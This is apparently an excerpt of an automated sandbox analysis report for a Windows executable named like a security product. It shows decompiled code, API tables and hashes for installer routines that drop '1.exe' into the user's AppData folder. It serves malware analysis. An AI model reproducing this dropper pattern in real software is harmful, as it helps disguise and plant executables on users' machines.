				signed int _t38;
				CHAR* _t39;
				signed int _t41;
				char _t52;
				char _t53;
				char _t55;
				char _t57;
				void* _t65;
				char* _t66;
				signed int _t80;
				intOrPtr _t86;
				char _t88;
				void* _t89;
				CHAR* _t90;
				void* _t92;
				signed int _t97;
				signed int _t99;
				void* _t100;

				_t92 = __esi;
				_t89 = __edi;
				_t65 = __ebx;
				_t38 = _a8;
				if(_t38 < 0) {
					_t86 =  *0x42ebfc; // 0x4ab049
					_t38 =  *(_t86 - 4 + _t38 * 4);
				}
				_push(_t65);
				_push(_t92);
				_push(_t89);
				_t66 = _t38 +  *0x42f478;
				_t39 = 0x42e3c0;
				_t90 = 0x42e3c0;
				if(_a4 >= 0x42e3c0 && _a4 - 0x42e3c0 < 0x800) {
					_t90 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t88 =  *_t66;
					if(_t88 == 0) {
						break;
					}
					__eflags = _t90 - _t39 - 0x400;
					if(_t90 - _t39 >= 0x400) {
						break;
					}
					_t66 = _t66 + 1;
					__eflags = _t88 - 4;
					_a8 = _t66;
					if(__eflags >= 0) {
						if(__eflags != 0) {
							 *_t90 = _t88;
							_t90 =  &(_t90[1]);
							__eflags = _t90;
						} else {
							 *_t90 =  *_t66;
							_t90 =  &(_t90[1]);
							_t66 = _t66 + 1;
						}
						continue;
					}
					_t41 =  *((char*)(_t66 + 1));
					_t80 =  *_t66;
					_t97 = (_t41 & 0x0000007f) << 0x00000007 | _t80 & 0x0000007f;
					_v24 = _t80;
					_v28 = _t80 | 0x00000080;
					_v16 = _t41;
					_v20 = _t41 | 0x00000080;
					_t66 = _a8 + 2;
					__eflags = _t88 - 2;
					if(_t88 != 2) {
						__eflags = _t88 - 3;
						if(_t88 != 3) {
							__eflags = _t88 - 1;
							if(_t88 == 1) {
								__eflags = (_t41 | 0xffffffff) - _t97;
								E0040618A(_t66, _t90, _t97, _t90, (_t41 | 0xffffffff) - _t97);
							}
							L42:
							_t90 =  &(_t90[lstrlenA(_t90)]);
							_t39 = 0x42e3c0;
							continue;
						}
						__eflags = _t97 - 0x1d;
						if(_t97 != 0x1d) {
							__eflags = (_t97 << 0xa) + 0x430000;
							E004060F7(_t90, (_t97 << 0xa) + 0x430000);
						} else {
							E00406055(_t90,  *0x42f428);
						}
						__eflags = _t97 + 0xffffffeb - 7;
						if(_t97 + 0xffffffeb < 7) {
							L33:
							E004063D2(_t90);
						}
						goto L42;
					}
					_t52 =  *0x42f42c;
					__eflags = _t52;
					_t99 = 2;
					if(_t52 >= 0) {
						L13:
						_a8 = 1;
						L14:
						__eflags =  *0x42f4c4;
						if( *0x42f4c4 != 0) {
							_t99 = 4;
						}
						__eflags = _t80;
						if(__eflags >= 0) {
							__eflags = _t80 - 0x25;
							if(_t80 != 0x25) {
								__eflags = _t80 - 0x24;
								if(_t80 == 0x24) {
									GetWindowsDirectoryA(_t90, 0x400);
									_t99 = 0;
								}
								while(1) {
									__eflags = _t99;
									if(_t99 == 0) {
										goto L30;
									}
									_t53 =  *0x42f424;
									_t99 = _t99 - 1;
									__eflags = _t53;
									if(_t53 == 0) {
										L26:
										_t55 = SHGetSpecialFolderLocation( *0x42f428,  *(_t100 + _t99 * 4 - 0x18),  &_v8);
										__eflags = _t55;
										if(_t55 != 0) {
											L28:
											 *_t90 =  *_t90 & 0x00000000;
											__eflags =  *_t90;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v8, _t90);
										_v12 = _t55;
										__imp__CoTaskMemFree(_v8);
										__eflags = _v12;
										if(_v12 != 0) {
											goto L30;
										}
										goto L28;
									}
									__eflags = _a8;
									if(_a8 == 0) {
										goto L26;
									}
									_t57 =  *_t53( *0x42f428,  *(_t100 + _t99 * 4 - 0x18), 0, 0, _t90); // executed
									__eflags = _t57;
									if(_t57 == 0) {
										goto L30;
									}
									goto L26;
								}
								goto L30;
							}
							GetSystemDirectoryA(_t90, 0x400);
							goto L30;
						} else {
							E00405FDE((_t80 & 0x0000003f) +  *0x42f478, __eflags, 0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t80 & 0x0000003f) +  *0x42f478, _t90, _t80 & 0x00000040);
							__eflags =  *_t90;
							if( *_t90 != 0) {
								L31:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatA(_t90, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L33;
							}
							E0040618A(_t66, _t90, _t99, _t90, _v16);
							L30:
							__eflags =  *_t90;
							if( *_t90 == 0) {
								goto L33;
							}
							goto L31;
						}
					}
					__eflags = _t52 - 0x5a04;
					if(_t52 == 0x5a04) {
						goto L13;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L13;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L13;
					} else {
						_a8 = _a8 & 0x00000000;
						goto L14;
					}
				}
				 *_t90 =  *_t90 & 0x00000000;
				if(_a4 == 0) {
					return _t39;
				}
				return E004060F7(_a4, _t39);
			}



























                                                          0x0040618a
                                                          0x0040618a
                                                          0x0040618a
                                                          0x00406190
                                                          0x00406195
                                                          0x00406197
                                                          0x004061a6
                                                          0x004061a6
                                                          0x004061ae
                                                          0x004061af
                                                          0x004061b0
                                                          0x004061b1
                                                          0x004061b4
                                                          0x004061bc
                                                          0x004061be
                                                          0x004061d5
                                                          0x004061d8
                                                          0x004061d8
                                                          0x004063af
                                                          0x004063af
                                                          0x004063b3
                                                          0x00000000
                                                          0x00000000
                                                          0x004061e5
                                                          0x004061eb
                                                          0x00000000
                                                          0x00000000
                                                          0x004061f1
                                                          0x004061f2
                                                          0x004061f5
                                                          0x004061f8
                                                          0x004063a2
                                                          0x004063ac
                                                          0x004063ae
                                                          0x004063ae
                                                          0x004063a4
                                                          0x004063a6
                                                          0x004063a8
                                                          0x004063a9
                                                          0x004063a9
                                                          0x00000000
                                                          0x004063a2
                                                          0x004061fe
                                                          0x00406202
                                                          0x00406212
                                                          0x00406219
                                                          0x0040621c
                                                          0x00406224
                                                          0x00406227
                                                          0x0040622e
                                                          0x0040622f
                                                          0x00406232
                                                          0x0040634f
                                                          0x00406352
                                                          0x00406382
                                                          0x00406385
                                                          0x0040638a
                                                          0x0040638e
                                                          0x0040638e
                                                          0x00406393
                                                          0x00406399
                                                          0x0040639b
                                                          0x00000000
                                                          0x0040639b
                                                          0x00406354
                                                          0x00406357
                                                          0x0040636c
                                                          0x00406373
                                                          0x00406359
                                                          0x00406360
                                                          0x00406360
                                                          0x0040637b
                                                          0x0040637e
                                                          0x00406347
                                                          0x00406348
                                                          0x00406348
                                                          0x00000000
                                                          0x0040637e
                                                          0x00406238
                                                          0x0040623f
                                                          0x00406241
                                                          0x00406242
                                                          0x0040625c
                                                          0x0040625c
                                                          0x00406263
                                                          0x00406263
                                                          0x0040626a
                                                          0x0040626e
                                                          0x0040626e
                                                          0x0040626f
                                                          0x00406271
                                                          0x004062aa
                                                          0x004062ad
                                                          0x004062bd
                                                          0x004062c0
                                                          0x004062c8
                                                          0x004062ce
                                                          0x004062ce
                                                          0x0040632d
                                                          0x0040632d
                                                          0x0040632f
                                                          0x00000000
                                                          0x00000000
                                                          0x004062d2
                                                          0x004062d9
                                                          0x004062da
                                                          0x004062dc
                                                          0x004062f6
                                                          0x00406304
                                                          0x0040630a
                                                          0x0040630c
                                                          0x0040632a
                                                          0x0040632a
                                                          0x0040632a
                                                          0x00000000
                                                          0x0040632a
                                                          0x00406312
                                                          0x0040631b
                                                          0x0040631e
                                                          0x00406324
                                                          0x00406328
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406328
                                                          0x004062de
                                                          0x004062e1
                                                          0x00000000
                                                          0x00000000
                                                          0x004062f0
                                                          0x004062f2
                                                          0x004062f4
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004062f4
                                                          0x00000000
                                                          0x0040632d
                                                          0x004062b5
                                                          0x00000000
                                                          0x00406273
                                                          0x0040628e
                                                          0x00406293
                                                          0x00406296
                                                          0x00406336
                                                          0x00406336
                                                          0x0040633a
                                                          0x00406342
                                                          0x00406342
                                                          0x00000000
                                                          0x0040633a
                                                          0x004062a0
                                                          0x00406331
                                                          0x00406331
                                                          0x00406334
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406334
                                                          0x00406271
                                                          0x00406244
                                                          0x00406248
                                                          0x00000000
                                                          0x00000000
                                                          0x0040624a
                                                          0x0040624e
                                                          0x00000000
                                                          0x00000000
                                                          0x00406250
                                                          0x00406254
                                                          0x00000000
                                                          0x00406256
                                                          0x00406256
                                                          0x00000000
                                                          0x00406256
                                                          0x00406254
                                                          0x004063b9
                                                          0x004063c3
                                                          0x004063cf
                                                          0x004063cf
                                                          0x00000000

                                                          APIs
                                                          • GetSystemDirectoryA.KERNEL32 ref: 004062B5
                                                          • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Roaming\1.exe,00000400,?,0042A070,00000000,00405256,0042A070,00000000), ref: 004062C8
                                                          • SHGetSpecialFolderLocation.SHELL32(00405256,76DDEA30,?,0042A070,00000000,00405256,0042A070,00000000), ref: 00406304
                                                          • SHGetPathFromIDListA.SHELL32(76DDEA30,C:\Users\user\AppData\Roaming\1.exe), ref: 00406312
                                                          • CoTaskMemFree.OLE32(76DDEA30), ref: 0040631E
                                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Roaming\1.exe,\Microsoft\Internet Explorer\Quick Launch), ref: 00406342
                                                          • lstrlenA.KERNEL32(C:\Users\user\AppData\Roaming\1.exe,?,0042A070,00000000,00405256,0042A070,00000000,00000000,00428145,76DDEA30), ref: 00406394
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                          • String ID: C:\Users\user\AppData\Roaming\1.exe$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                          • API String ID: 717251189-3561534422
                                                          • Opcode ID: cdc54c544b64f6d83ca5da95277fa7ec9e25f9e07b413b0e0ec9f16d5b3b497f
                                                          • Instruction ID: 7f70e83a291e570019a42af90a820afb382591873456cc4d5332d159a7ba1b0c
                                                          • Opcode Fuzzy Hash: cdc54c544b64f6d83ca5da95277fa7ec9e25f9e07b413b0e0ec9f16d5b3b497f
                                                          • Instruction Fuzzy Hash: 58612470A00110AADF206F65CC90BBE3B75AB55310F52403FE943BA2D1C77C8962DB9E
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00401759 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 147stringtimeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 334 401759-40177c call 402bce call 405afc 339 401786-401798 call 4060f7 call 405a8f lstrcatA 334->339 340 40177e-401784 call 4060f7 334->340 346 40179d-4017a3 call 4063d2 339->346 340->346 350 4017a8-4017ac 346->350 351 4017ae-4017b8 call 40646b 350->351 352 4017df-4017e2 350->352 360 4017ca-4017dc 351->360 361 4017ba-4017c8 CompareFileTime 351->361 354 4017e4-4017e5 call 405c6b 352->354 355 4017ea-401806 call 405c90 352->355 354->355 362 401808-40180b 355->362 363 40187e-4018a7 call 40521e call 4030d8 355->363 360->352 361->360 364 401860-40186a call 40521e 362->364 365 40180d-40184f call 4060f7 * 2 call 40618a call 4060f7 call 405813 362->365 377 4018a9-4018ad 363->377 378 4018af-4018bb SetFileTime 363->378 375 401873-401879 364->375 365->350 398 401855-401856 365->398 379 402a63 375->379 377->378 381 4018c1-4018cc FindCloseChangeNotification 377->381 378->381 382 402a65-402a69 379->382 384 4018d2-4018d5 381->384 385 402a5a-402a5d 381->385 387 4018d7-4018e8 call 40618a lstrcatA 384->387 388 4018ea-4018ed call 40618a 384->388 385->379 393 4018f2-40238c call 405813 387->393 388->393 393->382 393->385 398->375 400 401858-401859 398->400 400->364
                                                          C-Code - Quality: 61%
                                                          			E00401759(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				CHAR* _t83;
				void* _t85;

				_t75 = __ebx;
				_t82 = E00402BCE(0x31);
				 *(_t85 - 8) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
				_t33 = E00405AFC(_t82);
				_push(_t82);
				_t83 = "C:\\Users\\alfons\\AppData\\Roaming\\1.exe";
				if(_t33 == 0) {
					lstrcatA(E00405A8F(E004060F7(_t83, "C:\\Users\\alfons\\AppData\\Roaming")), ??);
				} else {
					E004060F7();
				}
				E004063D2(_t83);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E0040646B(_t83);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E00405C6B(_t83);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E00405C90(_t83, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 0xc) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E0040521E(0xffffffe2,  *(_t85 - 8));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x42f4c8;
						goto L32;
					} else {
						E004060F7(0x40ac38, 0x430000);
						E004060F7(0x430000, _t83);
						E0040618A(_t75, 0x40ac38, _t83, "C:\Users\alfons\AppData\Roaming",  *((intOrPtr*)(_t85 - 0x14)));
						E004060F7(0x430000, 0x40ac38);
						_t62 = E00405813("C:\Users\alfons\AppData\Roaming",  *(_t85 - 0x28) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x42f4c8 =  &( *0x42f4c8->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(_t83);
								_push(0xfffffffa);
								E0040521E();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E0040521E(0xffffffea,  *(_t85 - 8));
				 *0x42f4f4 =  *0x42f4f4 + 1;
				_push(_t75);
				_push(_t75);
				_push( *(_t85 - 0xc));
				_push( *((intOrPtr*)(_t85 - 0x20)));
				_t43 = E004030D8(); // executed
				 *0x42f4f4 =  *0x42f4f4 - 1;
				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x1c) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 0xc), _t85 - 0x1c, _t75, _t85 - 0x1c); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t85 - 0xc)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E0040618A(_t75, _t80, _t83, _t83, 0xffffffee);
					} else {
						E0040618A(_t75, _t80, _t83, _t83, 0xffffffe9);
						lstrcatA(_t83,  *(_t85 - 8));
					}
					_push(0x200010);
					_push(_t83);
					E00405813();
					goto L29;
				}
				goto L33;
			}

















                                                          0x00401759
                                                          0x00401760
                                                          0x00401769
                                                          0x0040176c
                                                          0x0040176f
                                                          0x00401774
                                                          0x00401775
                                                          0x0040177c
                                                          0x00401798
                                                          0x0040177e
                                                          0x0040177f
                                                          0x0040177f
                                                          0x0040179e
                                                          0x004017a8
                                                          0x004017a8
                                                          0x004017ac
                                                          0x004017af
                                                          0x004017b4
                                                          0x004017b6
                                                          0x004017b8
                                                          0x004017bd
                                                          0x004017bd
                                                          0x004017c8
                                                          0x004017c8
                                                          0x004017d9
                                                          0x004017db
                                                          0x004017db
                                                          0x004017dc
                                                          0x004017dc
                                                          0x004017df
                                                          0x004017e2
                                                          0x004017e5
                                                          0x004017e5
                                                          0x004017ec
                                                          0x004017fb
                                                          0x00401800
                                                          0x00401803
                                                          0x00401806
                                                          0x00000000
                                                          0x00000000
                                                          0x00401808
                                                          0x0040180b
                                                          0x00401865
                                                          0x0040186a
                                                          0x004015b0
                                                          0x004027bf
                                                          0x004027bf
                                                          0x00402a5a
                                                          0x00402a5d
                                                          0x00402a5d
                                                          0x00000000
                                                          0x0040180d
                                                          0x00401813
                                                          0x0040181e
                                                          0x0040182b
                                                          0x00401836
                                                          0x0040184c
                                                          0x0040184c
                                                          0x0040184f
                                                          0x00000000
                                                          0x00401855
                                                          0x00401855
                                                          0x00401856
                                                          0x00401873
                                                          0x00402a63
                                                          0x00402a63
                                                          0x00402a63
                                                          0x00401858
                                                          0x00401858
                                                          0x00401859
                                                          0x00401492
                                                          0x00402387
                                                          0x00402387
                                                          0x00402387
                                                          0x00401856
                                                          0x0040184f
                                                          0x00402a65
                                                          0x00402a69
                                                          0x00402a69
                                                          0x00401883
                                                          0x00401888
                                                          0x0040188e
                                                          0x0040188f
                                                          0x00401890
                                                          0x00401893
                                                          0x00401896
                                                          0x0040189b
                                                          0x004018a1
                                                          0x004018a5
                                                          0x004018a7
                                                          0x004018af
                                                          0x004018bb
                                                          0x004018a9
                                                          0x004018a9
                                                          0x004018ad
                                                          0x00000000
                                                          0x00000000
                                                          0x004018ad
                                                          0x004018c4
                                                          0x004018ca
                                                          0x004018cc
                                                          0x00000000
                                                          0x004018d2
                                                          0x004018d2
                                                          0x004018d5
                                                          0x004018ed
                                                          0x004018d7
                                                          0x004018da
                                                          0x004018e3
                                                          0x004018e3
                                                          0x004018f2
                                                          0x004018f7
                                                          0x00402382
                                                          0x00000000
                                                          0x00402382
                                                          0x00000000

                                                          APIs
                                                          • lstrcatA.KERNEL32(00000000,00000000,C:\Users\user\AppData\Roaming\1.exe,C:\Users\user\AppData\Roaming,00000000,00000000,00000031), ref: 00401798
                                                          • CompareFileTime.KERNEL32(-00000014,?,C:\Users\user\AppData\Roaming\1.exe,C:\Users\user\AppData\Roaming\1.exe,00000000,00000000,C:\Users\user\AppData\Roaming\1.exe,C:\Users\user\AppData\Roaming,00000000,00000000,00000031), ref: 004017C2
                                                            • Part of subcall function 004060F7: lstrcpynA.KERNEL32(?,?,00000400,0040341A,Name Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 00406104
                                                            • Part of subcall function 0040521E: lstrlenA.KERNEL32(0042A070,00000000,00428145,76DDEA30,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                            • Part of subcall function 0040521E: lstrlenA.KERNEL32(00403233,0042A070,00000000,00428145,76DDEA30,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                            • Part of subcall function 0040521E: lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,00428145,76DDEA30), ref: 0040527A
                                                            • Part of subcall function 0040521E: SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
                                                            • Part of subcall function 0040521E: SendMessageA.USER32 ref: 004052B2
                                                            • Part of subcall function 0040521E: SendMessageA.USER32 ref: 004052CC
                                                            • Part of subcall function 0040521E: SendMessageA.USER32 ref: 004052DA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                          • String ID: C:\Users\user\AppData\Roaming$C:\Users\user\AppData\Roaming$C:\Users\user\AppData\Roaming\1.exe
                                                          • API String ID: 1941528284-1198725897
                                                          • Opcode ID: 5509bd2040818d087d1bebcb726dff50be1ad66580b10ce54bc1622c5aeaffaf
                                                          • Instruction ID: bb6028c3778eb4cec0c6c1d7eb8bf073a5325157b60575559d09146ef789c5eb
                                                          • Opcode Fuzzy Hash: 5509bd2040818d087d1bebcb726dff50be1ad66580b10ce54bc1622c5aeaffaf
                                                          • Instruction Fuzzy Hash: D4419A32900515BACB107BB5CC45DAF3678EF05329F20833FF426B51E1DA7C8A529A6D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00406492 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 401 406492-4064b2 GetSystemDirectoryA 402 4064b4 401->402 403 4064b6-4064b8 401->403 402->403 404 4064c8-4064ca 403->404 405 4064ba-4064c2 403->405 407 4064cb-4064fd wsprintfA LoadLibraryExA 404->407 405->404 406 4064c4-4064c6 405->406 406->407
                                                          C-Code - Quality: 100%
                                                          			E00406492(intOrPtr _a4) {
				char _v292;
				int _t10;
				struct HINSTANCE__* _t14;
				void* _t16;
				void* _t21;

				_t10 = GetSystemDirectoryA( &_v292, 0x104);
				if(_t10 > 0x104) {
					_t10 = 0;
				}
				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
					_t16 = 1;
				} else {
					_t16 = 0;
				}
				_t5 = _t16 + 0x40a014; // 0x5c
				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed
				return _t14;
			}








                                                          0x004064a9
                                                          0x004064b2
                                                          0x004064b4
                                                          0x004064b4
                                                          0x004064b8
                                                          0x004064ca
                                                          0x004064c4
                                                          0x004064c4
                                                          0x004064c4
                                                          0x004064ce
                                                          0x004064e2
                                                          0x004064f6
                                                          0x004064fd

                                                          APIs
                                                          • GetSystemDirectoryA.KERNEL32 ref: 004064A9
                                                          • wsprintfA.USER32 ref: 004064E2
                                                          • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004064F6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: DirectoryLibraryLoadSystemwsprintf
                                                          • String ID: %s%s.dll$UXTHEME$\
                                                          • API String ID: 2200240437-4240819195
                                                          • Opcode ID: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
                                                          • Instruction ID: 03f82d29dddd483449b3488b7c2e1daaa1831c8d2f1a72e13e07ee25955ceb49
                                                          • Opcode Fuzzy Hash: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
                                                          • Instruction Fuzzy Hash: DDF0213051020A6BDB55D764DD0DFFB375CEB08304F14017AA58AF11C1DA78D5398B6D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004030D8 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 166COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 408 4030d8-4030ec 409 4030f5-4030fe 408->409 410 4030ee 408->410 411 403100 409->411 412 403107-40310c 409->412 410->409 411->412 413 40311c-403129 call 4032ea 412->413 414 40310e-403117 call 403300 412->414 418 4032d8 413->418 419 40312f-403133 413->419 414->413 420 4032da-4032db 418->420 421 403283-403285 419->421 422 403139-403182 GetTickCount 419->422 425 4032e3-4032e7 420->425 423 4032c5-4032c8 421->423 424 403287-40328a 421->424 426 4032e0 422->426 427 403188-403190 422->427 428 4032ca 423->428 429 4032cd-4032d6 call 4032ea 423->429 424->426 430 40328c 424->430 426->425 431 403192 427->431 432 403195-4031a3 call 4032ea 427->432 428->429 429->418 440 4032dd 429->440 434 40328f-403295 430->434 431->432 432->418 442 4031a9-4031b2 432->442 437 403297 434->437 438 403299-4032a7 call 4032ea 434->438 437->438 438->418 446 4032a9-4032b5 call 405d37 438->446 440->426 443 4031b8-4031d8 call 406625 442->443 450 40327b-40327d 443->450 451 4031de-4031f1 GetTickCount 443->451 452 4032b7-4032c1 446->452 453 40327f-403281 446->453 450->420 454 4031f3-4031fb 451->454 455 403236-403238 451->455 452->434 456 4032c3 452->456 453->420 457 403203-403233 MulDiv wsprintfA call 40521e 454->457 458 4031fd-403201 454->458 459 40323a-40323e 455->459 460 40326f-403273 455->460 456->426 457->455 458->455 458->457 463 403240-403247 call 405d37 459->463 464 403255-403260 459->464 460->427 461 403279 460->461 461->426 469 40324c-40324e 463->469 465 403263-403267 464->465 465->443 468 40326d 465->468 468->426 469->453 470 403250-403253 469->470 470->465
                                                          C-Code - Quality: 95%
                                                          			E004030D8(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
				signed int _v8;
				int _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				char _v88;
				void* _t65;
				long _t70;
				intOrPtr _t75;
				long _t76;
				intOrPtr _t77;
				void* _t78;
				int _t88;
				intOrPtr _t92;
				intOrPtr _t95;
				long _t96;
				signed int _t97;
				int _t98;
				int _t99;
				intOrPtr _t100;
				void* _t101;
				void* _t102;

				_t97 = _a16;
				_t92 = _a12;
				_v12 = _t97;
				if(_t92 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_v16 = _t92;
				if(_t92 == 0) {
					_v16 = 0x421448;
				}
				_t62 = _a4;
				if(_a4 >= 0) {
					E00403300( *0x42f498 + _t62);
				}
				if(E004032EA( &_a16, 4) == 0) {
					L41:
					_push(0xfffffffd);
					goto L42;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t92 != 0) {
							if(_a16 < _t97) {
								_t97 = _a16;
							}
							if(E004032EA(_t92, _t97) != 0) {
								_v8 = _t97;
								L44:
								return _v8;
							} else {
								goto L41;
							}
						}
						if(_a16 <= _t92) {
							goto L44;
						}
						_t88 = _v12;
						while(1) {
							_t98 = _a16;
							if(_a16 >= _t88) {
								_t98 = _t88;
							}
							if(E004032EA(0x41d448, _t98) == 0) {
								goto L41;
							}
							if(E00405D37(_a8, 0x41d448, _t98) == 0) {
								L28:
								_push(0xfffffffe);
								L42:
								_pop(_t65);
								return _t65;
							}
							_v8 = _v8 + _t98;
							_a16 = _a16 - _t98;
							if(_a16 > 0) {
								continue;
							}
							goto L44;
						}
						goto L41;
					}
					_t70 = GetTickCount();
					 *0x40bdac =  *0x40bdac & 0x00000000;
					 *0x40bda8 =  *0x40bda8 & 0x00000000;
					_t14 =  &_a16;
					 *_t14 = _a16 & 0x7fffffff;
					_v20 = _t70;
					 *0x40b890 = 8;
